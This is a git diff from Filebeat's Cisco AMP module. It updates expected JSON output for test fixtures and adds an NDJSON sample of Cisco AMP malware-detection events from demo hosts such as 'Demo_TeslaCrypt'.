"cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 80000000, + "cisco.amp.timestamp_nanoseconds": 260000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666694928269000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6233,20 +2565,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 319725, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 2204, + "log.offset": 62215, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6269,7 +2594,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:24.000Z", + "@timestamp": "2021-01-15T10:17:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6281,7 +2606,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.detection_id": "6176259135965757532", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6290,14 +2615,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 286000000, + "cisco.amp.timestamp_nanoseconds": 8000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256962712306000, + "event.id": 6176259135965757000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6310,7 +2635,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 321307, + "log.offset": 63534, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -6330,72 +2655,55 @@ ] }, { - "@timestamp": "2021-01-15T10:09:07.000Z", + "@timestamp": "2021-01-15T10:17:41.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617250006073346", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 296000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617250006073000, + "event.id": 1489955900291000600, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "tdss.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 322626, - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "explorer.exe", - "process.pid": 1892, + "log.offset": 64851, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_TDSS" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6403,80 +2711,64 @@ ] }, { - "@timestamp": "2021-01-15T10:09:02.000Z", + "@timestamp": "2021-01-15T10:17:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "5a:ff:4a:a3:8a:2f" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "DFC.CustomIPList", - "cisco.amp.detection_id": "5826709511729053698", - "cisco.amp.event_type_id": 1090519084, + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], - "cisco.amp.network_info.nfm.direction": "Outgoing connection from", - "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "5a:ff:4a:a3:8a:2f" + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 613000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.4.4", - "destination.port": 80, - "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 5826709511729054000, + "event.id": 6159251516445164000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", "fileset.name": "amp", - "host.hostname": "Demo_Tinba", - "host.name": "Demo_Tinba", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 324228, - "network.direction": "egress", - "network.transport": "TCP", - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "Explorer.EXE", - "process.pid": 1600, + "log.offset": 66143, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], "related.hosts": [ - "Demo_Tinba" + "Demo_TeslaCrypt" ], "related.ip": [ - "10.10.0.0", - "8.8.4.4", "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", - "source.ip": "10.10.0.0", - "source.port": 1083, "tags": [ "cisco-amp", "forwarded" - ], - "url.domain": "dak1otavola1ndos.com", - "url.extension": "php", - "url.original": "http://dak1otavola1ndos.com/h/index.php", - "url.path": "/h/index.php", - "url.scheme": "http" + ] } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log new file mode 100644 index 00000000000..4a0581fcd4d --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log @@ -0,0 +1,45 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 